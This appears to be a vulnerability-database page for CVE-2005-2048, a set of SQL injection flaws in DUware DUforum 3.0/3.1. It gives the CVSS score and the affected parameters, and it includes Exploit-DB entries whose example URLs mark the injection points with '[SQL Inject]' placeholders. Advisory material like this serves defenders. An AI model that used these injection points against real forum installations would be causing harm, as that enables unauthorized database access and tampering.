CVE-2005-2048
Published: 2005-06-22
Priority: P3 · 37 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.44% (82.2th percentile)
Multiple SQL injection vulnerabilities in DUware DUforum 3.1, and possibly other versions, allow remote attackers to execute arbitrary SQL commands via the (1) iMsg parameter to messages.asp, iFor parameter to (2) post.asp or (3) forums.asp, or (4) id parameter to userEdit.asp. NOTE: vectors 1 and 3 were later reported to affect version 3.0.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| duware | duforum | — | — |
No detection rules found.
Exploit-DB
DUware DUforum 3.0/3.1 - 'forums.asp?iFor' SQL Injection
exploitdb·2005-06-22
CVE-2005-2048 DUware DUforum 3.0/3.1 - 'forums.asp?iFor' SQL Injection
---
source: https://www.securityfocus.com/bid/14035/info
DUforum is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
http://www.example.com/DUforum/forums.asp?iFor=[SQL Inject]
Exploit-DB
DUware DUforum 3.0/3.1 - 'userEdit.asp?id' SQL Injection
exploitdb·2005-06-22
CVE-2005-2048 DUware DUforum 3.0/3.1 - 'userEdit.asp?id' SQL Injection
---
source: https://www.securityfocus.com/bid/14035/info
DUforum is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
http://www.example.com/DUforum/admin/userEdit.asp?id=[SQL Inject]
Exploit-DB
DUware DUforum 3.0/3.1 - 'post.asp?iFor' SQL Injection
exploitdb·2005-06-22
CVE-2005-2048 DUware DUforum 3.0/3.1 - 'post.asp?iFor' SQL Injection
---
source: https://www.securityfocus.com/bid/14035/info
DUforum is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
http://www.example.com/DUforum/post.asp?iFor=6[SQL Inject]
Exploit-DB
DUware DUforum 3.0/3.1 - 'messages.asp?iMsg' SQL Injection
exploitdb·2005-06-22
CVE-2005-2048 DUware DUforum 3.0/3.1 - 'messages.asp?iMsg' SQL Injection
---
source: https://www.securityfocus.com/bid/14035/info
DUforum is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
http://www.example.com/DUforum/messages.asp?iMsg=[SQL Inject]248&iFor=6
Exploit-DB
AIX 5.2 - 'netpmon' Local Privilege Escalation
exploitdb·2005-06-14
CVE-2005-0263 AIX 5.2 - 'netpmon' Local Privilege Escalation
Exploit-DB
AIX 5.2 - 'ipl_varyon' Local Privilege Escalation
exploitdb·2005-06-14
CVE-2005-0262 AIX 5.2 - 'ipl_varyon' Local Privilege Escalation
No writeups or analysis indexed.
http://echo.or.id/adv/adv19-theday-2005.txt
http://marc.info/?l=bugtraq&m=111945219205114&w=2
http://www.securityfocus.com/archive/1/453330/100/0/threaded
https://exchange.xforce.ibmcloud.com/vulnerabilities/30668